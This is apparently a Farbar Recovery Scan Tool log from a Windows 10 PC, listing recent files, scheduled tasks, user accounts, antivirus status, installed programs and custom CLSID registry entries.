2016-10-03 14:43 - 2016-04-20 08:36 - 00000000 ____D C:\Users\user\AppData\Local\Packages
2016-10-03 14:39 - 2016-07-16 05:22 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-10-03 14:36 - 2016-07-16 11:29 - 00000000 ___RD C:\WINDOWS\PrintDialog
2016-10-03 14:35 - 2016-07-16 11:29 - 00000000 ___RD C:\WINDOWS\MiracastView
2016-10-03 12:21 - 2015-02-02 09:39 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-10-03 12:21 - 2014-11-10 22:59 - 00008192 __RSH C:\BOOTSECT.BAK
2016-10-03 11:57 - 2015-05-15 14:44 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d08f0476acbae7.job
2016-10-03 11:49 - 2015-02-06 10:36 - 00000886 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1d041dfa521745e.job
2016-10-03 11:41 - 2014-12-18 12:30 - 00000886 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-10-03 10:26 - 2016-08-30 09:10 - 00000408 _____ C:\WINDOWS\Tasks\update-sys.job
2016-10-03 09:57 - 2014-12-18 12:30 - 00000922 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-10-03 09:26 - 2016-08-30 09:10 - 00000408 _____ C:\WINDOWS\Tasks\update-S-1-5-21-4142771536-1505296934-324239511-1000.job
2016-10-03 08:54 - 2015-03-11 20:35 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2016-09-29 09:19 - 2014-11-12 12:30 - 00000000 ____D C:\ProgramData\Package Cache
2016-09-19 13:41 - 2014-11-10 14:42 - 00068600 _____ C:\Users\admin\AppData\Local\GDIPFONTCACHEV1.DAT
2016-09-19 12:24 - 2016-02-16 16:22 - 00000000 ____D C:\Downloads-microTorrent
2016-09-14 09:26 - 2014-11-13 14:55 - 00000000 ____D C:\Users\admin\AppData\Roaming\TeamViewer
2016-09-13 16:13 - 2014-11-13 14:55 - 00000000 ____D C:\Program Files\TeamViewer
==================== Files in the root of some directories =======
2016-08-23 09:02 - 2016-08-23 09:02 - 7065600 _____ () C:\Program Files\GUT9C32.tmp
2015-08-24 09:26 - 2015-08-24 09:26 - 6420480 _____ () C:\Program Files\GUTFA.tmp
2016-04-14 22:37 - 2016-04-14 22:37 - 0209554 _____ () C:\Users\admin\AppData\Roaming\archive_inactive_hovered.png
2015-01-06 15:30 - 2015-01-08 16:21 - 0000096 _____ () C:\Users\admin\AppData\Roaming\Camdata.ini
2015-01-06 15:30 - 2015-01-08 16:21 - 0000408 _____ () C:\Users\admin\AppData\Roaming\CamLayout.ini
2015-01-06 15:30 - 2015-01-08 16:21 - 0000408 _____ () C:\Users\admin\AppData\Roaming\CamShapes.ini
2015-01-06 15:30 - 2015-01-08 16:21 - 0004548 _____ () C:\Users\admin\AppData\Roaming\CamStudio.cfg
2015-01-06 15:56 - 2015-01-06 15:56 - 0000098 _____ () C:\Users\admin\AppData\Roaming\CamStudio.Producer.command
2015-01-06 15:57 - 2015-01-08 10:27 - 0000000 _____ () C:\Users\admin\AppData\Roaming\CamStudio.Producer.Data.ini
2015-01-06 15:57 - 2015-01-08 10:27 - 0001207 _____ () C:\Users\admin\AppData\Roaming\CamStudio.Producer.ini
2016-05-27 13:12 - 2016-06-15 13:51 - 0000040 _____ () C:\Users\admin\AppData\Roaming\cdr.ini
2015-05-18 03:49 - 2015-05-18 03:49 - 0000517 _____ () C:\Users\admin\AppData\Roaming\console.log
2013-10-02 05:56 - 2013-10-02 05:56 - 0001097 _____ () C:\Users\admin\AppData\Roaming\man.table.footnotes.divider.xml
2016-04-14 22:37 - 2016-04-14 22:37 - 0002116 _____ () C:\Users\admin\AppData\Roaming\ParadoxologyMonkHerbal
2013-10-02 05:55 - 2013-10-02 05:55 - 0003767 _____ () C:\Users\admin\AppData\Roaming\ptc.xsl
2014-05-08 07:05 - 2014-05-08 07:05 - 0000524 _____ () C:\Users\admin\AppData\Roaming\red 485 bl 1.ADO
2013-10-02 05:56 - 2013-10-02 05:56 - 0001017 _____ () C:\Users\admin\AppData\Roaming\toc.blank.image.xml
2015-01-06 15:31 - 2015-01-08 16:11 - 0000096 _____ () C:\Users\admin\AppData\Roaming\version2.xml
2014-11-12 12:09 - 2016-04-06 15:22 - 0000600 _____ () C:\Users\admin\AppData\Roaming\winscp.rnd
2016-03-24 11:07 - 2016-06-03 12:40 - 0004608 _____ () C:\Users\admin\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-11-10 14:44 - 2014-11-10 14:44 - 0001579 _____ () C:\Users\admin\AppData\Local\FastClean.20141110.134451.txt
2015-12-11 09:59 - 2016-03-31 10:43 - 0000600 _____ () C:\Users\admin\AppData\Local\PUTTY.RND
2016-08-30 09:10 - 2016-08-30 09:10 - 0000003 _____ () C:\Users\admin\AppData\Local\updater.log
2016-08-30 09:10 - 2016-08-30 09:10 - 0000412 _____ () C:\Users\admin\AppData\Local\UserProducts.xml
2014-01-28 13:02 - 2014-01-28 13:02 - 0002602 _____ () C:\ProgramData\regid.2003-04.com.aquilatech_5B6B312A-87B8-465F-BBB3-93B231EBAD06.swidtag
2016-06-27 10:58 - 2016-06-27 10:58 - 0000032 _____ () C:\ProgramData\Temp.log
==================== Bamital & volsnap ======================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-10-03 14:31
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 10-10-2016
Ran by admin (13-10-2016 12:04:23)
Running from C:\Users\admin\Downloads
Microsoft Windows 10 Pro Version 1607 (X86) (2016-10-03 12:26:28)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
admin (S-1-5-21-4142771536-1505296934-324239511-1000 - Administrator - Enabled) => C:\Users\admin
Administrator (S-1-5-21-4142771536-1505296934-324239511-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-4142771536-1505296934-324239511-503 - Limited - Disabled)
Guest (S-1-5-21-4142771536-1505296934-324239511-501 - Limited - Disabled)
user (S-1-5-21-4142771536-1505296934-324239511-1001 - Limited - Enabled) => C:\Users\user
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: ESET Smart Security 9.0.402.0 (Enabled - Up to date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET Smart Security 9.0.402.0 (Enabled - Up to date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: ESET Personal firewall (Enabled) {D426EE12-AE7E-4602-F40F-BBCA8137EB0B}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\uTorrent) (Version: 3.4.9.42606 - BitTorrent Inc.)
7-Zip 9.38 beta (HKLM\...\7-Zip) (Version: - )
Acer Crystal Eye Webcam (HKLM\...\InstallShield_{A0382E3C-7384-429A-9BFA-AF5888E5A193}) (Version: 1.5.2904.00 - CyberLink Corp.)
Acer Crystal Eye Webcam (Version: 1.5.2904.00 - CyberLink Corp.) Hidden
Acer ePower Management (HKLM\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 6.00.3006 - Acer Incorporated)
ActiveState ActiveTcl 8.6.4.1 (HKLM\...\ActiveTcl 8.6.4.1) (Version: 8.6.4.1 - ActiveState Software Inc.)
Adobe Acrobat Reader DC (HKLM\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.017.20053 - Adobe Systems Incorporated)
Aegisub 3.2.2 (HKLM\...\{24BC8B57-716C-444F-B46B-A3349B9164C5}_is1) (Version: 3.2.2 - Aegisub Team)
AnyBurn (HKLM\...\AnyBurn) (Version: 3.4 - Power Software Ltd)
Avidemux 2.6 - 32 bits (32-bit) (HKLM\...\Avidemux 2.6 - 32 bits) (Version: 2.6.14.160917 - )
Bandicam (HKLM\...\Bandicam) (Version: 3.0.0.997 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM\...\BandiMPEG1) (Version: - Bandisoft.com)
Bullzip PDF Printer 10.11.0.2338 (HKLM\...\Bullzip PDF Printer_is1) (Version: 10.11.0.2338 - Bullzip)
CamStudio 2.7.2 (HKLM\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7.2 - CamStudio Open Source)
CamStudio Lossless Codec v1.5 (HKLM\...\camcodec) (Version: 1.5 - CamStudio)
Canon iP4300 (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_iP4300) (Version: - )
Citrix Online Launcher (HKLM\...\{678753E6-E526-4AE5-A144-00240772543A}) (Version: 1.0.393 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6514.5001 - Microsoft Corporation)
Convert AVI to MP4 (HKLM\...\{9ECE13D2-C028-44CB-8A96-A65196E7BBE7}_is1) (Version: - convertavitomp4.com)
Cult3D ActiveX Player (HKLM\...\Cult3D ActiveX Player) (Version: - )
CuneiForm OpenOCR (HKLM\...\{2C695618-6950-4C88-B836-A4FE7DD7FC9F}) (Version: 01.08.1006 - Cognitive Technologies)
Debut Video Capture Software (HKLM\...\Debut) (Version: 3.01 - NCH Software)
Digi Net Mobile (HKLM\...\Digi Net Mobile) (Version: 21.005.15.00.623 - Huawei Technologies Co.,Ltd)
Disable Autorun (HKLM\...\{53A1CC4F-5332-442B-B9E2-0F57C254B818}_is1) (Version: - www.disableautorun.com)
DjVuLibre DjView 3.5.27+4.10.4 (HKLM\...\DjVuLibre+DjView) (Version: 3.5.27+4.10.4 - DjVuZone)
Doublekiller Pro v2.1.0.104 (HKLM\...\Doublekiller Pro_is1) (Version: - )
EaseUS Partition Master 10.8 Trial Edition (HKLM\...\EaseUS Partition Master Trial Edition_is1) (Version: - EaseUS)
EDU Stiinte ale naturii 3 (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\EDU Stiinte ale naturii 3) (Version: 001.00.00.00 - Editura EDU)
ESET Smart Security (HKLM\...\{2708E743-745F-41CE-BA53-AE3095CFF411}) (Version: 9.0.386.0 - ESET, spol. s r.o.)
FileSeek 4.5 (HKLM\...\44953928-E730-4e8c-A2B2-3A85BC96A3D0_is1) (Version: 4.5.0.0 - Binary Fortress Software)
Free Alarm Clock (HKLM\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 4.0.1.0 - Comfort Software Group)
Free CD to MP3 Converter (HKLM\...\Free CD to MP3 Converter) (Version: - )
Free Studio version 6.4.3.128 (HKLM\...\Free Studio_is1) (Version: 6.4.3.128 - DVDVideoSoft Ltd.)
Free Video Joiner (HKLM\...\{14FA6DD9-92ED-493D-A937-81A78870E08A}_is1) (Version: - FreeVideoJoiner.com)
FreeOCR v5.4 (HKLM\...\freeocr_is1) (Version: - )
FXCC - MetaTrader 4 (HKLM\...\FXCC - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
FXCM MetaTrader 4 (HKLM\...\FXCM MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Genius Scanner (HKLM\...\{CCEB2144-5F5D-49E8-AADC-05CA48AE9AA5}) (Version: Version 1.4 - )
GnuWin32: Wget-1.11.4-1 (HKLM\...\Wget-1.11.4-1_is1) (Version: 1.11.4-1 - GnuWin32)
GoodSync (HKLM\...\{B26B00DA-2E5D-4CF2-83C5-911198C0F009}) (Version: 9.9.16.9 - Siber Systems)
Google Chrome (HKLM\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Drive (HKLM\...\{459CE109-4E46-4340-92BC-054642BC3BC2}) (Version: 1.31.2873.2758 - Google, Inc.)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.31.5 - Google Inc.) Hidden
GoToMeeting 7.24.0.5636 (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\GoToMeeting) (Version: 7.24.0.5636 - CitrixOnline)
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.09) (Version: 9.09 - Artifex Software Inc.)
GPL Ghostscript Lite 9.14.17 (HKLM\...\GPL Ghostscript Lite_is1) (Version: - Free Distribution)
IC Markets cTrader (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\d877e0b2b4793e58) (Version: 1.30.58489.34635 - IC Markets cTrader)
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Processor Graphics (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2418 - Intel Corporation)
IrfanView (remove only) (HKLM\...\IrfanView) (Version: 4.38 - Irfan Skiljan)
Java 2 Runtime Environment, SE v1.4.2_12 (HKLM\...\{7148F0A8-6813-11D6-A77B-00B0D0142120}) (Version: 1.4.2_12 - Sun Microsystems, Inc.)
Kolor Autopano Giga 4.0 (HKLM\...\AutopanoGiga4.0) (Version: V4.0.1 - Kolor)
Launch Manager (HKLM\...\LManager) (Version: 6.0.5 - Acer Inc.)
Lexmark Local Printer Settings Utility Uninstaller (HKLM\...\Lexmark Local Printer Settings Utility) (Version: - Lexmark International, Inc.)
Lexmark Software Uninstall (HKLM\...\Lexmark_HostCD) (Version: - Lexmark International, Inc.)
Lightshot-5.4.0.1 (HKLM\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.1 - Skillbrains)
Livestream Producer (HKLM\...\{CAB3390A-BAF0-4F8B-B40F-6DDDF963F719}) (Version: 1.0.19 - Livestream)
MagicDisc 2.7.106 (HKLM\...\MagicDisc 2.7.106) (Version: - )
MetaTrader 4 Admiral Markets AS (HKLM\...\MetaTrader 4 Admiral Markets AS) (Version: 4.00 - MetaQuotes Software Corp.)
MetaTrader 4 FinFX (HKLM\...\MetaTrader 4 FinFX) (Version: 4.00 - MetaQuotes Software Corp.)
MetaTrader 4 IC Markets (HKLM\...\MetaTrader 4 IC Markets) (Version: 6.00 - MetaQuotes Software Corp.)
MetaTrader 5 (HKLM\...\MetaTrader 5) (Version: 5.00 - MetaQuotes Software Corp.)
MetaTrader FIX (HKLM\...\MetaTrader FIX) (Version: 4.00 - MetaQuotes Software Corp.)
MetaTrader-Admiral Markets (HKLM\...\MetaTrader-Admiral Markets) (Version: 5.00 - MetaQuotes Software Corp.)
Microsoft LifeCam (HKLM\...\{BD71B413-9FEE-49BB-A6D1-2C0BFB99BDFE}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6425.1000 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM\...\{90110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.5614.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
MKVToolNix 9.4.2 (32bit) (HKLM\...\MKVToolNix) (Version: 9.4.2 - Moritz Bunkus)
Mobile Partner (HKLM\...\Mobile Partner) (Version: 21.005.22.00.03 - Huawei Technologies Co.,Ltd)
Mouse Suite (HKLM\...\MouseSuite98) (Version: - )
Mozilla Firefox 47.0.1 (x86 en-US) (HKLM\...\Mozilla Firefox 47.0.1 (x86 en-US)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MP4Tools v3.4 (HKLM\...\MP4Tools_is1) (Version: - Thüring IT-Consulting)
MWSnap 3 (HKLM\...\MWSnap 3) (Version: 3.0.0.74 - Mirek Wojtowicz)
NetBeans IDE 8.0.1 (HKLM\...\nbi-nb-base-8.0.1.0.201408251540) (Version: 8.0.1 - NetBeans.org)
OBS Studio (HKLM\...\OBS Studio) (Version: 0.16.0 - OBS Project)
Partition Bad Disk version 3.3.2 (HKLM\...\{CCAA63AC-AC48-4338-AA0A-B1FDA3EEA202}_is1) (Version: 3.3.2 - Goodlucksoft)
PDF Converter Elite 4.0 (HKLM\...\{51807840-3627-4016-B579-A32D54097837}_is1) (Version: 4.0 - PDFConverter.com)
PDF Power Tool 3.0.0.9 (HKLM\...\PDF Power Tool_is1) (Version: 3.0.0.9 - pdfpowertool.com)
PDF-Viewer (HKLM\...\{A278382D-4F1B-4D47-9885-8523F7261E8D}_is1) (Version: 2.5.317.1 - Tracker Software Products Ltd)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6392 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30127 - Realtek Semiconductor Corp.)
Remove Empty Directories version 2.2 (HKLM\...\{06F25DC8-71E2-44E2-805A-F15E15B51C74}_is1) (Version: 2.2 - Jonas John)
Skype™ 7.0 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SmoothboardAir (HKLM\...\SmoothboardAir) (Version: - )
SopCast 4.2.0 (HKLM\...\SopCast) (Version: 4.2.0 - www.sopcast.com)
Subtitle Edit 3.4.4 (HKLM\...\SubtitleEdit_is1) (Version: 3.4.4.0 - Nikse)
TeamViewer 11 (HKLM\...\TeamViewer) (Version: 11.0.65452 - TeamViewer)
Ultimate Christmas Scenic Reflections (HKLM\...\Ultimate Christmas Scenic Reflections) (Version: - ScenicReflections.com)
USBPcap 1.1.0.0-g794bf26 (HKLM\...\USBPcap) (Version: - )
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WakeOnLAN version 2.11.4.0 (HKLM\...\{05DF342B-3E1A-4862-9E67-8E7E9839D3EC}_is1) (Version: 2.11.4.0 - Aquila Technology)
Whiteboard V3.0.150611 (HKLM\...\Whiteboard) (Version: V3.0.150611 - Whiteboard)
WinDirStat 1.1.2 (HKU\S-1-5-21-4142771536-1505296934-324239511-1000\...\WinDirStat) (Version: - )
Windows 7 USB/DVD Download Tool (HKLM\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM\...\Windows Media Encoder 9) (Version: - )
WinFF 1.5.4 (Codename EMMA) (HKLM\...\WinFF_is1) (Version: - WinFF.org)
WinISO 5.3 (HKLM\...\WinISO_is1) (Version: - WinISO Computing Inc.)
WinPcap 4.1.3 (HKLM\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.11 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.11.0 - win.rar GmbH)
WinSCP 5.5.6 (HKLM\...\winscp3_is1) (Version: 5.5.6 - Martin Prikryl)
Wireshark 2.0.1 (32-bit) (HKLM\...\Wireshark) (Version: 2.0.1 - The Wireshark developer community, hxxps://www.wireshark.org)
WOL Magic Packet Sender (HKLM\...\{E268ADBD-A002-4684-AEDF-EA0F83F7E00B}) (Version: 1.5.0 - Zwalisoft)
WOLAgent (HKLM\...\{9A781D0A-AB4D-47FD-B963-732B21F800D7}) (Version: 1.00.0000 - Aquila Technology)
x264vfw - H.264/MPEG-4 AVC codec (remove only) (HKLM\...\x264vfw) (Version: - )
Xpdf Lite 3.3.4 (HKLM\...\Xpdf Lite_is1) (Version: - Free Distributions)
Xvid Video Codec (HKLM\...\Xvid Video Codec 1.3.3) (Version: 1.3.3 - Xvid Team)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0037AC54-E32B-4ACA-9864-09F869AA82FE}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{004B49B7-11B9-5058-FF22-08DD093ADC4B}\InprocServer32 -> {1F02685E-9468-D082-08F8-73EE85889A47} => No File
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{00BB2763-6A77-11D0-A535-00C04FD7D062}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{060AF76C-68DD-11D0-8FC1-00C04FD9189D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{083863F1-70DE-11D0-BD40-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0AF10CEC-2ECD-4B92-9581-34F6AE0637F3}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0B91A74B-AD7C-4A9D-B563-29EEF9167172}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0C15D503-D017-47CE-9016-7B3F978721CC}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{104846AB-42B1-4E38-A80D-136F78C3F258}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{12594540-9B58-4FE9-A7EA-8A10F641B049}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{14074E0B-7216-4862-96E6-53CADA442A56}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1643E180-90F5-11CE-97D5-00AA0055595A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1685D4AB-A51B-4AF1-A4E5-CEE87002431D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{171252A0-8820-4AFE-9DF8-5C92B2D66B04}\InprocServer32 -> C:\Program Files\Free Codec Pack\LAVFilters\LAVSplitter.ax (1f0.de - Hendrik Leppkes)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{17CCA71B-ECD7-11D0-B908-00A0C9223196}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{18907F3B-9AFB-4F87-B764-F9A4E16A21B8}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1B544C20-FD0B-11CE-8C63-00AA0044B51E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1C0F439D-7C29-4BDE-8952-4EEB6A49E048}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1C1800C1-3258-44C2-BE80-3DEADB6C5E39}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1DA08500-9EDC-11CF-BC10-00AA00AC74F6}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1E651CC0-B199-11D0-8212-00C04FC32C45}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1F1F4E1A-2252-4063-84BB-EEE75F8856D5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{247161C5-995C-4097-9FF4-655DC6D12DB5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{280A3020-86CF-11D1-ABE6-00A0C905F375}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{30276B4F-F25C-457C-A4B7-08574F8EA528}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{33156164-81D6-11D3-8006-00C04FA30A73}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{33156168-81D6-11D3-8006-00C04FA30A73}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{336475D0-942A-11CE-A870-00AA002FEAB5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{33D9A762-90C8-11D0-BD43-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{33FACFE0-A9BE-11D0-A520-00A0D10129C0}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{35786D3C-B075-49B9-88DD-029876E11C01}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{3D154A2D-D911-437E-A30C-5F56A9B7081D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{42AEDC87-2188-41FD-B9A3-0C966FEABEC1}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{4315D437-5B8C-11D0-BD3B-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{447AC255-CE81-43AD-9827-AFDDB1561B07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{4DB26476-6787-4046-B836-E8412A9E8A27}\InprocServer32 -> no filepath
